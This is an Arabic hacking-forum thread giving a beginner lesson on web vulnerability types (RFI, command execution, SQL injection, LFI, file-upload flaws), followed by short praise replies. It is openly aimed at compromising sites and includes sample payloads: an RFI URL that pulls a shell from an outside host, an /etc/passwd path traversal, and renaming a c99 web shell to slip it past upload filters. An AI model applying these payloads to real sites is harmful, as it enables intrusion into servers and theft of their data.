اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

الدرس الثاني شرح أنواع الثغرات ومفاهيمها

الدرس الثاني شرح أنواع الثغرات ومفاهيمها


صفحة 1 من 2 12 الأخيرةالأخيرة
النتائج 1 إلى 10 من 20

الموضوع: الدرس الثاني شرح أنواع الثغرات ومفاهيمها

  1. #1
    :: إدارة :: Aljyyosh Team Array الصورة الرمزية ASDELY-ScOrPiOn
    تاريخ التسجيل
    Jun 2009
    الدولة
    فلسطين
    المشاركات
    2,706

    Hasri الدرس الثاني شرح أنواع الثغرات ومفاهيمها



    السلام عليكم ورحمة الله وبركاته



    وصلنا والحمدلله لدرس الثاني في الدورة وهي ((شرح أنواع الثغرات ومفاهيمها))

    أنواع الثغرات وهي :

    1- Remote File Inclusion إختصارها RFI
    Remote Command Execution -2
    SQL -3
    Local File Inclution -4 إختصارها LFI
    Remote Upload Vulnerability -5

    امممم نبداء بشرح كلا منها

    =================================================


    النوع الأول هي ثغرة تسمح لك بسحب الشل من خارج الموقع الى الموقع عن طريق الرابط مثلا

    كود PHP:
    www.sec-t.com/index.php?id=http://site.com/shell.txt? 
    اذا كان الملف مصاب بثغرة include سوف يتم سحب الشل عن طريق وضع رابط الشل
    خلف علامة = بعد الرابط يجب ان نضع علامة ؟

    اذا كانت الثغرة شغالة سيتم سحب الشل

    اممم واحد بيسألني ماهو الشل
    الشل يا طويل العمر هو ملف مبرمج بلغة PHP ترفعه اذا وجدت ثغرة ويسمح لك بالتحكم بالموقع كاملا كأنك صاحب الموقع وسنشرحه في الدروس القادمه
    لأنه اساس الإختراق من ثغرات الـ web application

    ملاحظة : ثغرات include قد شارفت على الإنقراض وبقية منها 2% فقط من جميع المواقع على الشبكة

    يعني لو الثغرة كانت موجودة لو شرحت عليها مع التطبيق

    =================================


    الأن نروح لنوع الثاني وهو Remote Command Execution

    هاذي الثغرة تعجبني جدا وهي ثغرة تسمح لك بتنفيذ اوامر على السيرفر اوامر نظام التشغيل لينكس

    مثلا


    كود PHP:
    www.xxxx.com/index.php?=id 
    اذا كانت الثغرة مصابه سوف تسمح لنا بتنفيذ الأوامر بوضع الأمر بعد علامة =

    انا وضعت الأمر id وهو الأمر الذي يظهر صلاحيتي على السيرفر وانشالله نفهم اكثر في الدروس القادمه

    ==================================


    النوع الثلاث وهو SQL بالعربي تسمى ثغرات الحقن اي انك تحقن قواعد البيانات بأوامر لتستخرج منها معلومات قيمة جداا

    مثل باسورد ويوزر الأدمن المخزنة في القاعدة الخاصه بالسكريبت

    وهي الثغرة الأكثر شعبية واستعمالا الأن وقد تم الإطاحه بكبار المواقع مثل موقع الكاسبر سكاي و موقع مايكرسوفت بهاذه

    الثغرة و سيتم شرح استغلالها وتطبيقها بشرح مخصص لأنها ثغرة عظيمة تحتاج لفيديو او درس خاااص

    وتتواجد في أكثر من لغة برمجية كـ PHP و asp

    ==================================


    النوع الرابع وهو Local File Inclution وهاذيه الثغرة تسمح لك بقراءة ملفات على السيرفر

    مثل ملف etc/passwd وهو الملف الذي يحفظ يوزرات المواقع وطريقة الإستغلال هي

    كود PHP:
    www.xxx.com/index.php?=../../../../../etc/passwd 
    وطبعا كما تعودنا بعد علامة = نضع هذا الإستغلال ../../../../../etc/passwd

    ماذا تعني ../

    هذي تعني خطوة للخلف اي اذا كنا على هذا المسار vb/includes ووضعنا هذا الأمر بالإستغلال ../ سوف يتغير
    مسارنا لمجلد /vb/ مع الدروس القادمه سوف تفهمون انشالله كما قلت انه درس لفهم انواع ومفاهيم الثغرات
    وطرق عملها

    ================================


    النوع الخامس ولأخير وهو Remote Upload Vulnerability

    وهي ثغرات مراكز رفع الملفات فبعض المرمجين الغير مباليين يسمح لك برفع امتداد php كما عرفنا انه الشل يكون ملف مبرمج
    بلغة php اي امتداده ايضا php فهذا يسمح لنا برفع الشل مثلا شل بإسم c99.php

    وهناك ايضا بعض مراكز التحميل التي يمكن خداعها ففي بعضي الأحيان نجد مركز رفع يسمح لك برفع امتداد

    gif و jpg و rar و zip

    فبذالك يمكن خذاع المركز بإعادة تسمية الشل من c99.php الى c99.php.rar او c99.php.gif

    وسيتم الرفع و سأشرحه في درس مفصل مع التطبيق لووول

    وبهذا ننهي الدرس لهاذا اليوم واتمنى انا اكون قد وفيت في الشرح



  2. #2
    هكر مبتديء Array الصورة الرمزية موج الأحزان
    تاريخ التسجيل
    Jul 2009
    الدولة
    ksa-الدمام
    المشاركات
    29

    افتراضي رد: الدرس الثاني شرح أنواع الثغرات ومفاهيمها

    ياسلام عليك

    يالسبع


    على القوهـ


  3. #3
    هكر مبتديء Array
    تاريخ التسجيل
    Jul 2009
    المشاركات
    13

    افتراضي رد: الدرس الثاني شرح أنواع الثغرات ومفاهيمها

    مشكور الله يعطيك العافية ..
    تقبل مروري



  4. #4
    هكر مجتهد Array الصورة الرمزية اسد سوريا
    تاريخ التسجيل
    Sep 2009
    المشاركات
    275

    افتراضي رد: الدرس الثاني شرح أنواع الثغرات ومفاهيمها

    شكرا ومنتظرين جديدك


  5. #5
    هكر مبتديء Array
    تاريخ التسجيل
    Sep 2009
    المشاركات
    22

    افتراضي رد: الدرس الثاني شرح أنواع الثغرات ومفاهيمها

    تسلم يا المدير

    و إلى الأمام


  6. #6
    هكر مبتديء Array
    تاريخ التسجيل
    Sep 2009
    الدولة
    الأنترنت عالمي فاحذر مني
    المشاركات
    88

    افتراضي رد: الدرس الثاني شرح أنواع الثغرات ومفاهيمها

    مشكور وبارك الله فيك



  7. #7
    هكر مبتديء Array الصورة الرمزية روكي راكاك
    تاريخ التسجيل
    Oct 2009
    الدولة
    السعوديه
    المشاركات
    47

    افتراضي رد: الدرس الثاني شرح أنواع الثغرات ومفاهيمها

    يسلمواااااااااااااااااااا اا


  8. #8
    هكر مبتديء Array
    تاريخ التسجيل
    Jul 2010
    المشاركات
    44

    افتراضي رد: الدرس الثاني شرح أنواع الثغرات ومفاهيمها

    مشكور على المجهود


  9. #9
    هكر مبتديء Array
    تاريخ التسجيل
    Jan 2010
    المشاركات
    17

    افتراضي رد: الدرس الثاني شرح أنواع الثغرات ومفاهيمها

    ياسلام عليك يابطل منتظرين الدروس القادم كفو يالذيب



  10. #10
    محظور Array
    تاريخ التسجيل
    Jul 2010
    الدولة
    dark
    المشاركات
    1,130

    افتراضي رد: الدرس الثاني شرح أنواع الثغرات ومفاهيمها

    مشكووووووووووووووووور يا غالي


صفحة 1 من 2 12 الأخيرةالأخيرة

المواضيع المتشابهه

  1. أقوى اسطوانة عربية احترافية لاستغلآل جميـع أنواع الثغرات
    بواسطة ASDELY-ScOrPiOn في المنتدى قسم الثغرات
    مشاركات: 285
    آخر مشاركة: 05-25-2017, 05:19 PM
  2. شرح كامل لمعظم أنواع الثغرات ExPLoit
    بواسطة ASDELY-ScOrPiOn في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 36
    آخر مشاركة: 11-16-2013, 12:27 AM
  3. الدرس الثاني: فتح البورت 81
    بواسطة ASDELY-ScOrPiOn في المنتدى قسم اختراق الأجهزة
    مشاركات: 91
    آخر مشاركة: 05-14-2012, 08:12 PM
  4. الدرس الثاني: حوار حول الثغرات واستغلالها
    بواسطة ASDELY-ScOrPiOn في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 88
    آخر مشاركة: 04-30-2012, 04:01 AM
  5. الدرس الثاني من طرق الاختراق للمبتدئين
    بواسطة مدمر القراصنة في المنتدى قسم الثغرات
    مشاركات: 71
    آخر مشاركة: 07-17-2010, 03:49 AM

وجد الزوار هذه الصفحة بالبحث عن:

انواع الثغرات

اهم انواع الثغرات

أنواع الثغرات

شرح انواع الثغرات

شرح جميع انواع الثغرات

انواع الثغرات في المواقع

انواع ثغرات المواقع

انواع التغرات

استغلال جميع انواع الثغرات

شرح أنواع الثغرات

ماهي انواع الثغرات كتاب

ماهي انواع الثغرات

ما هى انواع ثغرات الاجهزة

اسماء وانواع الثغرات المجودة في الاجهزةانواع الثغرات rceشرح انواع التغرات وكيفية ايجادهاشرح استغلال جميع انواع الثغراتماهي انواع ثغرات المواقعأنواع الدوركت للثغرات شرح انواع ثغرات الاجهزهشرح ثغرات rceشرح انواع الثغرات واستغلالهاانواع الثغرات site:www.aljyyosh.comكتاب ثغرات الاجهزةكتب الثغران

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •